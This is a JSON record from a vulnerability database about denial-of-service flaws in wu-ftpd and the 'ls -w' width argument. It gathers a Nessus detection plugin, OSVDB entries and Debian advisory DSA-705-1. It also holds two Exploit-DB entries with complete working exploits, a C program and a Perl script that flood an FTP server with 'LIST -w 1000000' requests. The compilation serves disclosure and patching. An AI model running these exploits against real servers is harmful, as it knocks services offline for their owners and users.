The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CAN-2005-0256\n Adam Zabrocki discovered a denial of service condition\n in wu-ftpd that could be exploited by a remote user and\n cause the server to slow down by resource exhaustion.\n\n - CAN-2003-0854\n\n Georgi Guninski discovered that /bin/ls may be called\n from within wu-ftpd in a way that will result in large\n memory consumption and hence slow down the server.", "edition": 25, "published": "2005-04-11T00:00:00", "title": "Debian DSA-705-1 : wu-ftpd - missing input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0256", "CVE-2003-0854"], "modified": "2005-04-11T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:wu-ftpd"], "id": "DEBIAN_DSA-705.NASL", "href": "https://www.tenable.com/plugins/nessus/18010", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-705. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18010);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0854\", \"CVE-2005-0256\");\n script_xref(name:\"DSA\", value:\"705\");\n\n script_name(english:\"Debian DSA-705-1 : wu-ftpd - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several denial of service conditions have been discovered in wu-ftpd,\nthe popular FTP daemon. 
The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CAN-2005-0256\n Adam Zabrocki discovered a denial of service condition\n in wu-ftpd that could be exploited by a remote user and\n cause the server to slow down by resource exhaustion.\n\n - CAN-2003-0854\n\n Georgi Guninski discovered that /bin/ls may be called\n from within wu-ftpd in a way that will result in large\n memory consumption and hence slow down the server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-705\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wu-ftpd package.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.6.2-3woody5.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wu-ftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/11\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, 
\"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"wu-ftpd\", reference:\"2.6.2-3woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"wu-ftpd-academ\", reference:\"2.6.2-3woody5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:59", "bulletinFamily": "software", "cvelist": ["CVE-2003-0854"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf)\n[Secunia Advisory ID:10126](https://secuniaresearch.flexerasoftware.com/advisories/10126/)\n[Secunia Advisory ID:14834](https://secuniaresearch.flexerasoftware.com/advisories/14834/)\n[Secunia Advisory ID:17069](https://secuniaresearch.flexerasoftware.com/advisories/17069/)\n[Related OSVDB ID: 4621](https://vulners.com/osvdb/OSVDB:4621)\nRedHat RHSA: RHSA-2003:310\nRedHat RHSA: RHSA-2003:309\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00085.html\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000768\nOther Advisory URL: http://www.turbolinux.com/security/TLSA-2003-60.txt\nOther Advisory URL: http://www.guninski.com/binls.html\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000771\nOther Advisory URL: http://www.debian.org/security/2005/dsa-705\nOther Advisory URL: http://mail.immunix.com/pipermail/immunix-announce/2003-October/0087.html\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf\nOther Advisory URL: http://www.securityfocus.com/advisories/6014\nOther Advisory URL: 
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:106\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2003-q4/1313.html\nMail List Post: http://mail.gnu.org/archive/html/bug-coreutils/2003-10/msg00070.html\nKeyword: Georgi Guninski security advisory #62\n[CVE-2003-0854](https://vulners.com/cve/CVE-2003-0854)\n", "modified": "2003-05-16T14:37:06", "published": "2003-05-16T14:37:06", "href": "https://vulners.com/osvdb/OSVDB:4620", "id": "OSVDB:4620", "type": "osvdb", "title": "fileutils/coreutils ls -w Argument WU-FTPD Memory Consumption DoS", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:59", "bulletinFamily": "software", "cvelist": ["CVE-2003-0853"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf)\n[Secunia Advisory ID:17069](https://secuniaresearch.flexerasoftware.com/advisories/17069/)\n[Related OSVDB ID: 4620](https://vulners.com/osvdb/OSVDB:4620)\nOther Advisory URL: http://mail.immunix.com/pipermail/immunix-announce/2003-October/0087.html\n[CVE-2003-0853](https://vulners.com/cve/CVE-2003-0853)\n", "modified": "2003-05-16T14:37:06", "published": "2003-05-16T14:37:06", "href": "https://vulners.com/osvdb/OSVDB:4621", "id": "OSVDB:4621", "type": "osvdb", "title": "ls -w Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T11:44:42", "description": "wu-ftpd 2.6.2 Remote Denial Of Service Exploit (wuftpd-freezer.c). CVE-2003-0854. 
Dos exploit for linux platform", "published": "2003-10-31T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.6.2 - Remote Denial of Service Exploit wuftpd-freezer.c", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0854"], "modified": "2003-10-31T00:00:00", "id": "EDB-ID:115", "href": "https://www.exploit-db.com/exploits/115/", "sourceData": "/*\r\n* (c) Rosiello Security\r\n*\r\n* Copyright Rosiello Security 2003\r\n* All Rights reserved.\r\n*\r\n* Tested on Red Hat 9.0\r\n*\r\n* Author: Angelo Rosiello\r\n* Mail : angelo rosiello org\r\n* This software is only for educational purpose.\r\n* Do not use it against machines different from yours.\r\n* Respect law.\r\n*\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <string.h>\r\n\r\nvoid addr_initialize( );\r\nvoid usage( );\r\n\r\nint main( int argc, char **argv )\r\n{\r\n\tint i, sd, PORT, loop, error;\r\n\tchar user[30], password[30], ch;\r\n\tstruct sockaddr_in server_addr;\r\n\r\n fprintf( stdout, \"\\n(c) Rosiello Security 2003\\n\" );\r\n fprintf( stdout, \"http://www.rosiello.org\\n\" );\r\n fprintf( stdout, \"WU-FTPD 2.6.2 Freezer by Angelo Rosiello\\n\\n\" );\r\n\r\n\tif( argc != 6 ) usage( argv[0] );\r\n\r\n\tif( strlen( argv[3] ) > 20 ) exit( 0 );\r\n\tif( strlen( argv[4] ) > 20 ) exit( 0 );\r\n\r\n\tsprintf( user, \"USER %s\\n\", argv[3] );\r\n\tsprintf( password, \"PASS %s\\n\", argv[4] );\r\n\r\n\tPORT = atoi( argv[2] );\r\n\tloop = atoi( argv[5] );\r\n\r\n\taddr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));\r\n\tsd = socket( AF_INET, SOCK_STREAM, 0 );\r\n\r\n \terror = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));\r\n\tif( error != 0 )\r\n\t{\r\n\t\tperror( \"Something wrong with the connection\" );\r\n\t\texit( 0 );\r\n\t}\r\n\r\n\twhile ( ch != '\\n' )\r\n {\r\n recv( sd, &ch, 1, 0);\r\n printf(\"%c\", ch );\r\n }\r\n\r\n\tch = '\\0';\r\n\r\n\tprintf( \"Connection executed, now 
waiting to log in...\\n\" );\r\n\r\n\tprintf( \"%s\", user );\r\n\r\n\tsend( sd, user, strlen( user ), 0 );\r\n\twhile ( ch != '\\n' )\r\n\t{\r\n\t\trecv( sd, &ch, 1, 0);\r\n\t\tprintf(\"%c\", ch );\r\n\t}\r\n\tprintf( \"%s\", password );\r\n\r\n\tch = '\\0';\r\n\r\n \tsend( sd, password, strlen( password ), 0 );\r\n while ( ch != '\\n' )\r\n {\r\n recv( sd, &ch, 1, 0);\r\n printf(\"%c\", ch );\r\n }\r\n\r\n\tprintf( \"Sending the DoS query\\n\" );\r\n\tfor( i=0; i<loop; i++ )\r\n\t{\r\n\t\twrite( sd, \"LIST -w 1000000 -C\\n\", 19 );\r\n\t}\r\n\tprintf( \"All done\\n\" );\r\n\tclose( sd );\r\n\treturn 0;\r\n}\r\n\r\nvoid addr_initialize (struct sockaddr_in *address, int port, long IPaddr)\r\n{\r\n \taddress -> sin_family = AF_INET;\r\n \taddress -> sin_port = htons((u_short)port);\r\n \taddress -> sin_addr.s_addr = IPaddr;\r\n}\r\n\r\nvoid usage( char *program )\r\n{\r\n\tfprintf(stdout, \"USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\\n\", program);\r\n \texit(0);\r\n}\r\n\n\n// milw0rm.com [2003-10-31]\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/115/"}, {"lastseen": "2016-02-02T20:39:26", "description": "Coreutils 4.5.x LS Width Argument Integer Overflow Vulnerability. CVE-2003-0853. Dos exploit for linux platform", "published": "2003-10-22T00:00:00", "type": "exploitdb", "title": "Coreutils 4.5.x LS Width Argument Integer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0853"], "modified": "2003-10-22T00:00:00", "id": "EDB-ID:23274", "href": "https://www.exploit-db.com/exploits/23274/", "sourceData": "source: http://www.securityfocus.com/bid/8875/info\r\n\r\nCoreutils 'ls' has been reported prone to an integer overflow vulnerability. The issue reportedly presents itself when handling width and column display command line arguments. 
It has been reported that excessive values passed as a width argument to 'ls' may cause an internal integer value to be misrepresented. Further arithmetic performed based off this misrepresented value may have unintentional results.\r\n\r\nAdditionally it has been reported that this vulnerability may be exploited in software that implements and invokes the vulnerable 'ls' utility to trigger a denial of service in the affected software. \r\n\r\n#!/usr/bin/perl\r\n\r\n# DoS sploit for ls \r\n# tested against wu-ftpd 2.6.2\r\n\r\n# coded by (c) druid \r\n# greets to viator\r\n\r\nuse Net::FTP;\r\n\r\n(($target = $ARGV[0])&&($count = $ARGV[1])) || die \"usage:$0 <target> <count>\";\r\nmy $user = \"anonymous\";\r\nmy $pass = \"halt\\@xyu.com\";\r\n$cols=1000000;#you can increase this value for more destructive result ;)\r\n\r\n\r\nprint \":: Trying to connect to target system at: $target...\\n\"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die \"could not \r\nconnect: $!\";\r\nprint \"Connected!\\n\";\r\n$ftp->login($user, $pass) || die \"could not login: $!\"; \r\nprint \"Logged in!\\n\";\r\n$ftp->cwd(\"/\");\r\nwhile ($count)\r\n{\r\n$ftp->ls(\"-w $cols -C\");\r\n $count--; \r\n}\r\nprint \"Done!\\n\";\r\n$ftp->quit; \r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23274/"}], "debian": [{"lastseen": "2020-11-11T13:25:25", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0256", "CVE-2003-0854"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 705-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 4th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : wu-ftpd\nVulnerability : missing input sanitising\nProblem-Type : remote\nDebian-specific: no\nCVE IDs : CAN-2005-0256 
CAN-2003-0854\n\nSeveral denial of service conditions have been discovered in wu-ftpd,\nthe popular FTP daemon. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCAN-2005-0256\n\n Adam Zabrocki discovered a denial of service condition in wu-ftpd\n that could be exploited by a remote user and cause the server to\n slow down through resource exhaustion.\n\nCAN-2003-0854\n\n Georgi Guninski discovered that /bin/ls may be called from within\n wu-ftpd in a way that will result in large memory consumption and\n hence slow down the server.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.6.2-3woody5.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 2.6.2-19.\n\nWe recommend that you upgrade your wu-ftpd package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5.dsc\n Size/MD5 checksum: 607 78463b3882e0d32102344bb0580e0d98\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5.diff.gz\n Size/MD5 checksum: 101661 967b719c02892c867ad0d6456a5dd47a\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2.orig.tar.gz\n Size/MD5 checksum: 354784 b3c271f02aadf663b8811d1bff9da3f6\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd-academ_2.6.2-3woody5_all.deb\n Size/MD5 checksum: 3484 
cc6ee1aeb156077af311870f095840ab\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_alpha.deb\n Size/MD5 checksum: 292630 c164f9f2d0ae5d70587ca49ddbe543b4\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_arm.deb\n Size/MD5 checksum: 265840 c86cdbc78969f755dce0facce4a1f882\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_i386.deb\n Size/MD5 checksum: 255216 504af14aec48191405c08a56845d330b\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_ia64.deb\n Size/MD5 checksum: 321932 ced4192d937ccedfa5a7ab2e9e77c378\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_hppa.deb\n Size/MD5 checksum: 276624 4a1b5b6115ed1d93206c9787e8d37038\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_m68k.deb\n Size/MD5 checksum: 249810 e873e950d3b234a7854ee0e4810783f5\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_mips.deb\n Size/MD5 checksum: 273426 364c07d6a21f8aab43b3841ce98df8c6\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_mipsel.deb\n Size/MD5 checksum: 273568 4e51f44342035b6ecafc624b1a6c06f3\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_powerpc.deb\n Size/MD5 checksum: 268816 4072fbbb73bd8013b9a191f3aa7bd778\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_s390.deb\n Size/MD5 checksum: 263638 d86fc84ab2974a80fd7407d826d8b003\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/w/wu-ftpd/wu-ftpd_2.6.2-3woody5_sparc.deb\n Size/MD5 checksum: 270784 
1110401bccc9035cc1b30eb8146aee18\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2005-04-04T00:00:00", "published": "2005-04-04T00:00:00", "id": "DEBIAN:DSA-705-1:CDBB7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00085.html", "title": "[SECURITY] [DSA 705-1] New wu-ftpd packages fix denial of service", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}